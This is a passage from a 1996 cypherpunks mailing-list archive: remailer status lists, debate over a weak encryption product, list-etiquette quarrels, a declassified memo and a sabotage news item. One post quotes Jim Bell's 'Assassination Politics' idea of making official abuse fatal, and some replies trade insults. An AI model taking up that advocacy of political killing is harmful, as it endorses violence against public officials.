CPU cycles to search for new ones, check out:

http://ourworld.compuserve.com/homepages/justforfun/range.htm(l?)



- ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702
dsmith@prairienet.org        http://www.prairienet.org/~dsmith
send mail with subject of "send pgp-key" for my PGP public key
"Remember: King Kong died for your sins" - Principia Discordia
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMqJpMXEZTZHwCEpFAQEq/wf+NFGMQtkqDgcJzrOvBMwqeHvJmy6Rx5S2
/goRQCyoxIVtwzYRuPwRByWvsylpinq2F1VH+Jsfpg4PFzDgYxjElROY0Ne/XnsV
2roop+zKkXDBpElC+2dRp+OrBHFer+EU3bOXfINRe8QyLJLu7+gmZWE1ghOBRC/1
5hdHTTSnWGFRFPU3suz+XRznmCkTuFl5y2ycV2TWQMmXqcBmaoPVikeygcnXCcax
EJgwFg7+od2SZ97SIBqsDbSYKNFnUGgP0ZScZXf6op8UWSwq2x2KKYlbYptQKVjX
UmBt40SFP+YcTllKqe9XGSyilY7Pe96O3PFbmR+Ni7LY8AQcH4w0Qw==
=X0ML
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Sun, 1 Dec 1996 21:30:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Announcement: Very Good Privacy
Message-ID: <199612020530.XAA24979@cdale3.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Sun Dec 01 23:30:00 1996
> Dear Sir,
> 
> >     I'm not sure how an encryption product that uses encryption
> >     algorithms weaker than Pretty Good Privacy can be described
> >     as being better than PGP.  
> >
> >     Especially when all the algorithms listed have known problems
> >     of one kind, or another.   << And yes, I know that the known
> >     problems -- in some instances --- are entirely theoretical in
> >     nature.  >>
> 
> What puzzles me is that he included two cyphers that are _extremely_
>  easy to
> break, the vignere cypher and the ascii cypher. Why include these? And
>  what
> is his new permutation of RC4 and DES?
> 

Concur.  Also, let's see: only available for Win95/NT, no sources
available, and cyphers that are known to be weak - and that can
be used without any warnings whatsoever - anyone else watching
their Snake-Oil-O-Meter get pegged?

Give us some source code, port it to XWindows, and then maybe
we'll talk.

dave


- ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702
dsmith@prairienet.org        http://www.prairienet.org/~dsmith
send mail with subject of "send pgp-key" for my PGP public key
"Remember: King Kong died for your sins" - Principia Discordia
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMqJpYHEZTZHwCEpFAQFWPAf/Q2FoUPrgXAyjkWlLRQiRSV544TawvdL0
efdxOuRoGJ9jPSOBxm2KepfSw6Gl6yjwK7buuIB9LcMPMbp41Yn7Z4BTx1lY4fEQ
XjdKMZMGoDYfiFCP4Xm9D1vG0cX+eWUL9jxih3ZSGR8OjcypVNrTBxoSbO3q5pHu
69+ASfTdcyG4VySD/YJ2NM17P2wzU7BTNXawOIisaN87Us5hTNLtHt55/D5r5pcs
SPgLo1bBBP/z98+/r6flPtIk7LXwWPqWuJRMFp5FVUk+9/TfbdgsUT9tfl7VzABW
nY4z+zVvSuFBomVR5ON9wdNonG8YAeBCQGHy69oXhsErKDv6EXgbDQ==
=VeBI
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 1 Dec 1996 22:53:40 -0800 (PST)
To: unde0275@frank.mtsu.edu (Internaut)
Subject: Re: IP address
In-Reply-To: <01BBDFD6.61E65120@s10-pm04.tnstate.campus.mci.net>
Message-ID: <199612020649.AAA02184@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Internaut wrote:
> 
> What is the risk of publishing your dynamic IP address to a web page =
> while you are on line?  How vulnerable is someone just connected to the =
> internet, w/o any server running? What attacks are feasable? --Internaut
> 

ping flood

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Mon, 2 Dec 1996 00:51:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Hurray! A good example of rational thinking ...
In-Reply-To: <199611280144.RAA19906@server1.chromatic.com>
Message-ID: <32A298F7.5D2D@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> wrote:

A message that, as expected, is inappropriate for this subject line.

But in general, cypherpunks seems to have improved remarkably over the 
last couple weeks. I'd guess that the V-flames had the unintended 
consequence of driving off the other ranters and ravers, because they 
tend to lack the technical and thinking skills necessary for building 
killfiles.

You may take this as support for the Gaia Hypothesis, I suppose.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Sun, 1 Dec 1996 21:58:19 -0800 (PST)
To: remailer-operators@c2.org
Subject: WinSock Remailer Back Up
Message-ID: <199612020558.AAA60470@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Y'all:

Due to a misconfiguration on one of the two machines that
operate the WinSock Remailer, messages were lost from about
Wednesday, 27 November, to Sunday, 1 December.  We apologize
for the lost messages.

Regards,

Joey Grasty
Jim Ray
WinSock Remailer Operators

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMqJvkg6sYKeTQAOtAQGrNwMA2MYpRHLtkeksVcoyx6T9+V+36fey8FXM
sdbxI3DjN8Xq8Se81R7+qXNWxgVx2/HxQtu4w9Ea1GQz4B8cjYdlMVLXNIgdGrHy
3We8saHtvVIzCTFnvFIEn6MStNAZb+gw
=9Vso
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 1 Dec 1996 18:10:26 -0800 (PST)
To: Mark Rosen <mrosen@peganet.com>
Subject: Re: Secure Memory Deletion
In-Reply-To: <199612012354.SAA13950@mercury.peganet.com>
Message-ID: <Pine.LNX.3.94.961202020640.703A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 1 Dec 1996, Mark Rosen wrote:

> 	Does anyone know any papers on secure deletion of things from memory? That
> is one thing that most people are oblivious to, though, if a program leaves
> your unencrypted passkey laying in memory or a buffer of your plaintext,
> then all the encryption in the world won't help. Should I overwrite the 32
> times specified for hard drives, or are RAM chips easier to clear? Thanks.

1 time _should_ work for RAM chips, AFAIK.

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

Live long and prosper.
                -- Spock, "Amok Time", stardate 3372.7


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMqI5wzCdEh3oIPAVAQGE5wf7BbOXQv13u/JS/nByogiN7ukaoiejZdyl
1Mq+Dxpe6mJvUPR72n5ygeQ8kKMP9nV5s6A9dm32qXDIYE/uzrEt+RLZbxtt0eMV
1uwxjVcxJdBvMgeFhxvblT1AhDNdvBHO3ELgPnU3T+DnUJOTPCb/ychsQ98YdYPQ
gp0/nyJK9kCQPRPjZNvR8qP3RV9xd03KMBjwMJIfNw+RDfTtlQEEjhD9P6zSt4ky
spPL4ccKrM8mGS67g5mLW14V+mbn4qM3gmfS6f6VbkP0DovAIBxCzDbBACvkexOy
SRPCvvxL/2XiZ6NkGy844LFhJqlMMQWEUF+YrQykgBS9ST5uePquew==
=GGrT
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: orders@compugen.net
Date: Mon, 2 Dec 1996 02:32:31 -0800 (PST)
Subject: Just in time for Christmas!!!
Message-ID: <199612021032.EAA14770@mailhost.onramp.net>
MIME-Version: 1.0
Content-Type: text/plain


Dear Computer User:

The perfect gift for your family, a friend, or just for yourself.

                   "Personal Computer Accessories" 

Mitsumi Keyboards,  Microsoft Mouse, Computer Speakers and more...

  Select the URL below to place your order; just in time for Christmas.


***************************************************************************
    To place your order visit our website at:  http://www.pcorders.com
***************************************************************************







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Rosen" <mrosen@peganet.com>
Date: Sun, 1 Dec 1996 23:55:31 -0800 (PST)
To: "David E. Smith" <cypherpunks@toad.com>
Subject: Re: Announcement: Very Good Privacy
Message-ID: <199612020758.CAA14517@mercury.peganet.com>
MIME-Version: 1.0
Content-Type: text/plain


> > What puzzles me is that he included two cyphers that are _extremely_
> >  easy to
> > break, the vignere cypher and the ascii cypher. Why include these? And
> >  what
> > is his new permutation of RC4 and DES?
> > 
> 
> Concur.  Also, let's see: only available for Win95/NT, no sources
> available, and cyphers that are known to be weak - and that can
> be used without any warnings whatsoever - anyone else watching
> their Snake-Oil-O-Meter get pegged?
	The plus side of the Vigenere and ASCII ciphers is that they are fast. For
example, on a friend's machine, I can get 1.7mb/s using ASCII while NewDES,
the fastest "secure" algorithm, runs at a only 600k/s. Documentation of
each algorithm with an explanation of its security is provided in the help
file. As for snake-oil, this is a genuine product. I am trying to compete
with Puffer 2.0, which costs like $25-$30; $5 is certainly less than that.
As soon as I get the money to buy the needed compiler, I'll make a port to
the Mac, and a port to Windows 3.1 should surface in a few days.

> Give us some source code, port it to XWindows, and then maybe
> we'll talk.
	I'm working on installing Linux on my machine and will be working on an X
port. I'll keep you posted. BTW, I personally really enjoy using VGP and
have encrypted all of my source code and other archived things like that.

Mark Rosen
FireSoft - http://www.geocities.com/SiliconValley/Pines/2690
Mark Eats AOL - http://www.geocities.com/TimesSquare/6660/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@adsl-122.cais.com>
Date: Mon, 2 Dec 1996 00:52:25 -0800 (PST)
To: whgiii@amaranth.com (William H. Geiger III)
Subject: Re: Dorthy Denning is a boot-licking fasicist!!!
In-Reply-To: <199611262215.QAA21070@mailhub.amaranth.com>
Message-ID: <9612020851.AA11325@adsl-122.cais.com>
MIME-Version: 1.0
Content-Type: text


William H. Geiger III wrote:
[snip]
> I don't know if anyone watched the House Subcomitty on Computers &
> Technology today on C-Span.
> 
> Phil Zimmerman, Dorthy Denning, William Reinsch & others were disscussing
> computer security.
> 
> Dorthy Denning gave the most pro-government speech I have ever heard. Is
> this clueless bitch on the government payroll?!!
[snip]

Well, you may find the following interesting... I'll stick this on
the web scanned someplace soon just to allay any sillieness about it being
fud. It may be a bit dated, but obviously is still relivant. 

Tim



--------------------------------------------------------------------------------

                     NATIONAL SECURITY COUNCIL


UNCLASSIFIED                                 13-Apr-1993 13:08 EDT
(CONFIDENTIAL)

MEMORANDUM FOR:

              George J. Tenet                           (TENET)
              David Kelly                               (KELLYD)
              Richard C. Barth                          (BARTH)

FROM:         Michael J. Waguespack
                (WAGUESPACK)

SUBJECT:     ENCRYPTION


THE FBI JUST ADVISED THAT THEY HAVE RECEIVED A TELEPHONE
INQUIRY FROM DOROTHY DENNING RE THE ENCRYPTION STORY. SHE
APPARENTLY WAS CALLED BY MARKOV [sic] WHO SEEMS TO HAVE SOME
KNOWLEDGE OF WHAT IS BREWING AND THAT SOMEING IS ABOUT TO
BREAK. MARKOV ALLEGEDLY GOT HIS INFORMATION FROM A "RETIRED
GOVERNMENT EXECUTIVE." MARKOV RELATED TO DENNING THAT HE IS
-----------------[blacked out text] -----------------------
-----------------------------------------------------------  E.O.
-----------------------------------------------------------  12356
                                                            1.3 (a)(4)
HERE WE GO!

CC:Records                           (RECORDS)







                        Partially declassified/Released on 10/3/94
                             under provisions of E.0. 12356
                        by J. Saunders, National Security Council
   

                                                       Doc #39


[Obtained under the Freedom of Information Act by the Electronic 
Privacy Information Center, 1994]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 2 Dec 1996 05:52:30 -0800 (PST)
To: adamsc@io-online.com
Subject: Re: IP address
In-Reply-To: <19961202055418796.AAA68@rn240.io-online.com>
Message-ID: <199612021038.EAA02902@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Adamsc wrote:
> 
> On Sun, 1 Dec 1996 22:23:30 -0600, Internaut wrote:
> 
> >What is the risk of publishing your dynamic IP address to a web page while you are on line?  How vulnerable is someone just connected to the internet, w/o any server running? What attacks are feasable? --Internaut
> 
> Well, if you are running Win95 (all) or 3.1 (w/certain TCP/IP stacks) your
> machine can be locked up or rebooted at *any* time using just PING!
> 

Isn't is Unix that is actually vulnerable?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 2 Dec 1996 06:53:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199612021450.GAA23899@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk mix pgp hash latent cut ek";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = "<winsock@rigel.cyberpass.net> cpunk pgp pgponly hash cut ksub reord";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"balls"} = "<remailer@huge.cajones.com> cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp pgponly hash latent cut ek";
$remailer{"middle"} = "<middleman@jpunix.com> cpunk mix pgp hash middle latent cut ek reord ?";
$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"dustbin"} = "<dustman@athensnet.com> cpunk pgp hash latent cut ek mix reord middle ?";
$remailer{'weasel'} = '<config@weasel.owl.de> newnym pgp';
$remailer{"death"} = "<x@deathsdoor.com> cpunk pgp hash latent post";
$remailer{"reno"} = "<middleman@cyberpass.net> cpunk mix pgp hash middle latent cut ek reord ?";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.
remailer@crynwr.com is _not_ a remailer.

There is no remailer at relay.com.

Groups of remailers sharing a machine or operator:
(cyber mix)
(weasel squirrel)

The alpha and nymrod nymservers are down due to abuse. However, you
can use the nym or weasel (newnym style) nymservers.

The cyber nymserver is quite reliable for outgoing mail (which is
what's measured here), but is exhibiting serious reliability problems
for incoming mail.

The squirrel and winsock remailers accept PGP encrypted mail only.

403 Permission denied errors have been caused by a flaky disk on the
Berkeley WWW server. This seems to be fixed now.

The penet remailer is closed.

Last update: Mon 2 Dec 96 6:49:59 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
weasel   config@weasel.owl.de             ++++++---++   2:15:58  99.98%
lucifer  lucifer@dhp.com                  ++++++-++++*    39:05  99.92%
cyber    alias@alias.cyberpass.net        ******-+***+    36:36  99.91%
lead     mix@zifi.genetics.utah.edu       *+++++-+++**    37:21  99.91%
nym      config@nym.alias.net             #*+#*#-#####     2:02  99.91%
jam      remailer@cypherpunks.ca          ***** ******    14:42  99.86%
squirrel mix@squirrel.owl.de              ++++++---++   2:12:47  99.74%
middle   middleman@jpunix.com             - ------.--   3:35:44  99.66%
replay   remailer@replay.com              *** - -+****    21:25  99.28%
mix      mixmaster@remail.obscura.com     ++-+++-._.-  11:59:53  99.24%
dustbin  dustman@athensnet.com            +  ++-___.-+ 23:00:40  98.77%
reno     middleman@cyberpass.net          ----- --.--   3:00:22  98.71%
haystack haystack@holy.cow.net            *#**#  #** #    13:51  97.64%
extropia remail@miron.vip.best.com        --------- -   7:34:35  97.19%
exon     remailer@remailer.nl.com         #####*-#*#*#    25:16  96.88%
winsock  winsock@rigel.cyberpass.net           -    -+  7:01:07  62.06%
balls    remailer@huge.cajones.com        ******-       4:04:02  58.23%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 2 Dec 1996 07:09:41 -0800 (PST)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: denial of service and government rights
In-Reply-To: <Pine.SUN.3.94.961201224004.2080A-100000@polaris>
Message-ID: <32A2F0D1.7A5A@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
> On Sun, 1 Dec 1996, Dale Thorn wrote:
> > Black Unicorn wrote:
> > > On Sun, 1 Dec 1996, Dale Thorn wrote:
> > > > Black Unicorn wrote:
> > > > > On Sat, 30 Nov 1996, Dale Thorn wrote:
> > > > > > > Example:  George Bush's old pal at the Wash. DC P.R. firm hires the
> > > > > > > niece(?) of a Kuwaiti official to testify in front of Congress in full
> > > > > > > view of the American people on television, that the Iraquis were throwing
> > > > > > > babies out of incubators in Kuwait, thereby securing the necessary votes
> > > > > > > in Congress to prosecute the Gulf War.

[snippo]

> What you're talking about is contempt of congress.  This is not "fraud."
> "I had no idea what I was talking about, but as luck would have it I was
> right anyhow." Here, have a bozo button.

I was right, and you just can't stand it, can you?  I think the shoe fits
you, Mr. Clown, so wear it in "good health".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 2 Dec 1996 07:21:34 -0800 (PST)
To: bryce@digicash.com
Subject: Re: [NOISE]-- [PHILOSOPHYPUNKS] Re: The House Rules At The Permanent Virtual Cypherpunks Party
In-Reply-To: <199612021148.MAA04719@digicash.com>
Message-ID: <32A2F39C.5996@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Bryce wrote:
> Hi Dale.  I believe I've seen you around.  Thanks for replying
> to my article.
> >  Bryce wrote:
> > > I.  Etiquette -- The House Rules At The Virtual Cypherpunks Party
> > > The Meta-Rule:  It's John Gilmore's virtual house.  He is the
> > > sole owner of the computer (toad.com) that hosts cypherpunks
> > > and the sole authority over what the users of that computer
> > > (you) can do with it.

> > Ordinarily, I'd leave this post alone, but I really hate it when people
> > twist ideas for their own philosophical purposes.  To whit: "John is the
> > sole authority over what the users of his computer can do with his
> > computer" (quote approximate).
> > I don't *do* anything with *his* computer. I send email into the ether
> > with an address on it, and he picks it up at his discretion and does
> > what he wants with it.  I am in no way involved in that process, and I
> > do not share *any* responsibility for how he handles the email.

> Hm.  So if you send an email into the ether with
> "Cc: cypherpunks@toad.com" and "Subject: MAKE MONEY REALLY
> TRULY FAST!", then you share no responsibility for the fact
> that a copy of that email is going to arrive in the inboxes of
> thousands of subscribers?
> Okay, it could be an interesting discussion, but what's your point?
> My point was (and is) that neither you nor I have any kind of
> _right_ to access the services of toad.com against John's
> will.  Seems like a very simple point (deceptively simple, one
> might say...), but I recall several people, including Dale
> Thorn, opining that Dmitri Vulis _did_ have the right to access
> those services with or without John's consent.

Now I've gotcha!  If I, Dale Thorn, an ordinary person (not a commercial
mailer), realize somehow what your snail mail address is (an analogy),
and I send you a personal letter, are you saying I don't have the "right"
to do so?  Even if I am aware that you redistribute the letter, as, say,
a newspaper such as the L.A. Times would?

I'm guessing that what you're saying is something to do with the content
or size of such a mailing, yes?

But whatever the case, I'm not "doing something with" your mailbox if
I send you a snail mail letter, and I'm not "doing something with" your
computer if I send you a posting. It's you who know the result of opening
up your computer to the phone lines, and it's up to you to post *your*
"rules", and to date, I don't recall any postings from John Gilmore to
me or the list regarding such rules, just a few little tin-plated
dictators doing it in his name.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Sun, 1 Dec 1996 23:27:50 -0800 (PST)
To: "Jim 'AP' Bell" <cypherpunks@toad.com>
Subject: Re: denial of service and government rights
In-Reply-To: <199612011948.LAA08876@mail.pacifier.com>
Message-ID: <199612020728.AAA16346@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


- ----------------------------------------------------------------------

In <199612011948.LAA08876@mail.pacifier.com>, on 12/01/96 
   at 11:40 AM, jim bell <jimbell@pacifier.com> said:

::Unicorn has a long history of reciting government abuses, but then
::failing  to provide any sort of answer to them.  My solution (AP: 
::"Assassination  Politics") would make such abuse fatal. 
:: 
        Jim, I knew we could count on you for a solution!

- --
  maybe there is an analogy:

  militias:   "the only way they'll take my weapon
              is from my cooling, smoking hand...."

  prez:       "the only way they'll take my executive privileges
              is to impeach me --IF I consent to leave."

            <attila>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMqKExb04kQrCC2kFAQHFrgP7BEsIx7uTw6tOio2Sr5JdzaetlqrupyP3
hjrbI6CIOwldM7jPh3KcdpGi7f+9juKSP4qJeftP2PKduuYVSCqF5o22wW23qKRz
VmuJRqrgGpbgcRVoKCcHfqme9X001inmShJMQ69B531kpOOdkDL+b9Zm3kyBjEtO
VKQTqMpO0l4=
=T+pv
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 2 Dec 1996 07:27:19 -0800 (PST)
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: denial of service and government rights
In-Reply-To: <3.0.32.19961201220509.0068a234@mail.io.com>
Message-ID: <32A2F537.16B@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Greg Broiles wrote:
> At 05:24 PM 12/1/96 -0800, Dale Thorn wrote:
> >So what you're saying is I (or we) can testify in front of Congress on
> >essentially any topic, telling a blatant lie (that we know is false, and
> >which they will subsequently prove is false), and totally get away with
> >it.  You and I can do that, is that what you're saying?

> This is idiotic. I suspect it's deliberately idiotic, but I can't see what
> anyone gains by it. If you've got a point to make, would you please just
> say what you're thinking and move on?

See below.

> There's a big difference between something being punishable and someone
> being punished. The false testimony was given on behalf of a friendly
> government, and in favor of a cause which met with widespread national
> support and was the focus of much (literal) flag-waving and patriotic
> speechifying. In general, you face very few risks if you lie in a way which
> helps a very popular cause, and the people you're lying to want to do the
> thing that your lies are purportedly justifying. Your risks are much
> greater if you're saying something unpopular or if you are an unpopular
> person. I'm not talking about law, I'm talking about politics. And the fact
> that laws are sometimes enforced in a political matter shouldn't be news to
> anyone. (I'm not saying that's good, but I think it's attributable to and a
> result of to the general fallibility of human beings, myself included, so
> I'm skeptical about easy answers. Real-world solutions tend to fall short
> of theoretical perfection. Doh.)

> >If that is true, then my original contention that things are far worse
> >than the person I originally responded to was imagining, stands as
> >correct.  Things are bad indeed.

> I'd sure appreciate it if you'd just say what you're thinking (if it's
> on-topic) instead of playing stupid "Is X true? Is Y true? Wow! I've just
> discovered something new!" games. Your comments suggest to me that what
> you're dancing around is, essentially, that the government is morally wrong
> because it (eliding distinctions between governments and branches of
> governments) enforces laws in an erratic or discriminatory or political
> fashion. That's what I'm extracting from your messages. If there's
> something more to what you're saying, I think I'd have a better chance of
> extracting it if you devoted less energy to tricky rhetorical strategies.

I sympathize.  My original posting was short and clear.  This is what
happens when people who don't think as clearly as you do (sadly, a
majority of c-punks) respond to a posting with deliberately twisted
logic to "refute" a point.  See Black Unicorn's recent posts about
denial of service for an excellent example of this.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 2 Dec 1996 06:31:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Hurray! A good example of rational thinking ...
In-Reply-To: <32A298F7.5D2D@ix.netcom.com>
Message-ID: <sJaByD32w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves <rcgraves@ix.netcom.com> writes:
> But in general, cypherpunks seems to have improved remarkably over the
> last couple weeks. I'd guess that the V-flames had the unintended
> consequence of driving off the other ranters and ravers, because they
> tend to lack the technical and thinking skills necessary for building
> killfiles.

Timmy May (fart) appears to have shut up, and that's a Good Thing.

Good riddance to Timmy.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@gonzo.ben.algroup.co.uk>
Date: Mon, 2 Dec 1996 03:36:54 -0800 (PST)
To: John Fricker <jfricker@vertexgroup.com>
Subject: Re: The Good Doctor againternaut <unde0275@frank.mtsu.edu>
In-Reply-To: <19961202053027130.AAA190@dev.vertexgroup.com>
Message-ID: <9612021032.aa08173@gonzo.ben.algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Internaut <unde0275@frank.mtsu.edu>
Date: Mon, 2 Dec 1996 09:08:13 -0800 (PST)
To: "'Igor Chudov'" <Adamsc@io-online.com>
Subject: RE: IP address
Message-ID: <01BBE040.DE540E40@s19-pm03.tnstate.campus.mci.net>
MIME-Version: 1.0
Content-Type: text/plain




> Adamsc wrote:
> > Igor wrote
> > > On Sun, 1 Dec 1996 22:23:30 -0600, Internaut wrote:
> > >What is the risk of publishing your dynamic IP address to a web page 
> > >while you are on line?  How vulnerable is someone just connected to > > >the internet, w/o any server running? What attacks are feasable? --> 
>> Well, if you are running Win95 (all) or 3.1 (w/certain TCP/IP stacks) your
>> machine can be locked up or rebooted at *any* time using just PING!
>Isn't is Unix that is actually vulnerable?
I tried pinging myself off and it didn't work; maby it has to be from a remote host.
	






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alzheimer@juno.com (Ronald Raygun Remailer)
Date: Mon, 2 Dec 1996 08:36:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Copyright violations
Message-ID: <19961202.103443.9599.0.alzheimer@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


-- Financial Times, 11/29/96

REUTERS STAFFER SABOTAGES HONG KONG BANK DEALING ROOMS

A computer operator at Reuters in Hong Kong recently sabotaged the
dealing room systems of five of the company's investment bank clients.
The attack crippled for up to 36 hours the computer systems delivering
market prices and news to traders at NatWest Markets, Jardine Fleming,
Standard Chartered and two other banks. The banks, which resorted to
alternative terminals such as Bloomberg, claimed the tampering had no
significant impact on trading and said neither they nor their clients
experienced losses as a result. The initial breach occurred on November
18. Reuters engineer Winston Cheng (now suspended) allegedly paid
maintenance visits to several clients and used his password to gain
access to the operating system at the heart of the Reuters networks. He
entered commands that would delete key operating system files after a
delay to allow him to leave the building. The first bank to report
problems at 6:00 P.M. was Standard Charter, followed by the others. The
dealing room systems were partially fixed by the morning to allow trading
to continue more or less as normal but it was not until the next day that
they were restored to full operation. As well as reviewing procedures on
staff, Reuters is considering restrictions on its maintenance engineers'
access to trading floors and the system software.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@LSD.com>
Date: Mon, 2 Dec 1996 12:00:38 -0800 (PST)
Subject: Looking for "PrOduct Cypher"
